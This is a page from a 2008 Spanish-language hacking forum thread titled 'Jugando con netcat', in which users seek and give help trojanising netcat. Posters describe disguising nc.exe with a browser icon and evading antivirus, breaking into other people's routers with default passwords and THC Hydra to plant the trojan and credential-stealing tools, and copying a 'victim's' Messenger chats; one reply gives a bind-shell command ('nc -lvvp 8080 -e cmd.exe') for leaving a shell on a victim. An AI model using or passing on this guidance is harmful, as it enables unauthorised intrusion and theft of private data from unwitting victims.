elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  Jugando con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 ... 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [42] 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 278,208 veces)
DeoZamoX

Desconectado Desconectado

Mensajes: 21



Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #410 en: 28 Febrero 2008, 01:17 am »

Lo que necesitan es leer algo sobre firewalls y seguridad y entender como funciona netcat antes de meter comandos. ¿De qué serviría que logres la conexion si de todas formas no entendes qué hiciste?

Si estoy empezando a querer abrir puertos de routers ajenos significa que ya tengo una base solida de conocimientos, si se lo que hizo el cryptcat, se como se conecta, se que es una dns, tengo no-ip, se como abrir puertos en mi propio router, hize pruebas en mi computadora y en las computadoras de la escuela, mis pruebas fueron satisfactorias y ahora lo ultimo que me falta es como poder expanderme a la red de redes... eso es todo...

Lo siento Dario... pero no por mi escasa edad pienses que tengo escasos conocimientos... por cierto, he buscado todo este tiempo en google como hacerlo, pero no he encontrado nada, por algo estoy pidiendo ayuda...
En línea

D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #411 en: 28 Febrero 2008, 22:13 pm »

DeoZamoX: No me refería a tu duda sino a los repetitivos "El antivirus detecta NetCat", o "No puedo cambiarle el icono al NetCat" y eso...

En tu caso te va a ser muy difícil hacer las cosas con ese router ahí... así que tendrías que hacerte con el control del mismo.
Los routers vienen con un password por defecto y la gente no los suele cambiar. Podés consultar una Base de Datos de passwords por defecto en los routers.

Otro nombre que te dejo es THC Hydra  ; )  (Googlea...)

Hackear un router es un paso más al de saltarse Firewalls (más si hablamos del de Windows), pero con algo de paciencia e info seguramente lograrás infiltrarte ahí y plantar un NetCat Troyanizado... y porqué no otras cositas ;) (nircmd, wget, iehv, messenpass) y aprovechar la conexión.

Suerte
En línea

OpenBSDFreeBSD
DeoZamoX

Desconectado Desconectado

Mensajes: 21



Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #412 en: 29 Febrero 2008, 04:19 am »

Woow... no esperé esto pero... Gracias ^^
En línea

elmeister

Desconectado Desconectado

Mensajes: 43


Ver Perfil
Re: Jugando con netcat
« Respuesta #413 en: 1 Marzo 2008, 14:30 pm »

supongo que en lugar de usar uestra IP, será mejor usar una cuenta de no-ip.com., sobretodo si usamos una conexion con ip dinámica, asi no hay que volver a currarse el troyano cada vez que cambies de IP
En línea

SoulFire

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Jugando con netcat
« Respuesta #414 en: 17 Marzo 2008, 01:48 am »

Muy bueno, lo pondre en practica a ver que sale...
En línea

messiah22

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Jugando con netcat
« Respuesta #415 en: 21 Marzo 2008, 20:12 pm »

wenas soy nuevo y tengo un fallo mui tonto
no paso ni de la primera linea XD creo que me e saltado algo
abro el resoucer hacker hago los paso
File/Open > nc.exe, Add a new Resource abro el icono del ie
pongo lo de icongroup y abajo icon y me dice
unable to add selected icon

por que  :huh:
En línea

sirkhawn

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Jugando con netcat
« Respuesta #416 en: 29 Marzo 2008, 18:54 pm »

buenas gente... antes que nada quiero agradecer este thread que es fantastico...
eh leido mucho...
practicamente 20 de sus 30 paginas... y eh aprendido mucho..
me eh conectado a mi "victima" siguiendo el paso 1 del 1º post...
lo que tengo una duda y si bien lo encontre y lo intente ... no pude realizarlo.. esto es.. como bajar a mi PC, un archivo X de la "victima"; por ejemplo, digamos, una conversacion del messenger de sus conversaciones... por dar un ejemplo...

digamos nose.. mimmamemima@hotmail.com.html

yo pove con ftp, o con el otro comando k no recuerdo en este momento ¬¬
pero no logre hacerlo...
por otro lado tampoco logre conectarme con el VNC viewer...

podrian ayudarme con esto?
...
por otro lado, es posible ver un archivo txt o htm desde la misma ventada del dos, (cmd)¿?
saludos!

EDIT:
Ya encontre la respuesta que buscaba para la transferencia de archivos, la comparto por si alguien la necesita... aca: http://l-bytes.es/resources/textos/cys/Transferencia_Shell.htm

Por otro lado, me surgio otro problema...
por alguna razon despues de un tiempo, pierdo la conexión...
y no puedo volver a conectarme
pense que se habia corrompido el netcat o algo asi..
asique hice uno nuevo y comenze a hacer pruebas con mi propia maquina.. la cuestion es que de ningun modo podia conectarme por el puerto 80, ni a mi maquina ni a ninguna...
decidi probar con el puerto 81, y exito, me conecte...
luego de un rato, perdi la conexión...
y nuevamente no puedo conectarme ni por el puerto 80 ni por el 81 , a mi maquina o a cualquier otra...
alguien sabe a que se debe?
saludos
« Última modificación: 31 Marzo 2008, 01:47 am por sirkhawn » En línea

sniffer_666

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Jugando con netcat
« Respuesta #417 en: 2 Abril 2008, 02:40 am »

yo ya tengo este programa como hago para instalarlo por que nc.exe solo me sale la ventana donde tengo algo que dice

Cmd line: y al colo car algo de este lado se cierra la pantalla ayudenme

y disculpen la ignorancia Gracias por su tiempo...
En línea

Martín Fierro


Desconectado Desconectado

Mensajes: 381


Por crom!!!. Chiapas dedo izquierdo de wadalbertía


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #418 en: 2 Abril 2008, 03:46 am »

yo ya tengo este programa como hago para instalarlo por que nc.exe solo me sale la ventana donde tengo algo que dice

Cmd line: y al colo car algo de este lado se cierra la pantalla ayudenme

y disculpen la ignorancia Gracias por su tiempo...


Compadre, lo primero que tienes que hacer es leerte este post completito, ahi verás que es lo que pasa...

 :D :D

Bueno te ayudo, el nc no es un programa como piensas que se ejecuta y ya, es un programa de línea de comandos por lo que tendrás que aprender a usarlo abriendolo desde una consola y aprendiendote sus parámetros.

Código:
C:\Documents and Settings\Administrador.DESKTOP>nc -h
[v1.10 NT]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, stealth mode

        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

Código:
nc -lvvp 8080 -e cmd.exe
Sirve para dejar en la víctima un puerto abierto que al conectarlo te regale una hermosa shell.

para conectar al mismo puerto sería:

Código:
nc -vv 127.0.0.1 8080

La ip pues la tienes que cambiar por la de tu víctima..
En línea

Y no me importa nada..
sniffer_666

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Jugando con netcat
« Respuesta #419 en: 2 Abril 2008, 04:13 am »

gracias por su tiempo amigo....voy a leer todo el post  a ver que hay aqui....

                                              ...G::r::a::c::i::a::s...
En línea

Páginas: 1 ... 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [42] 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines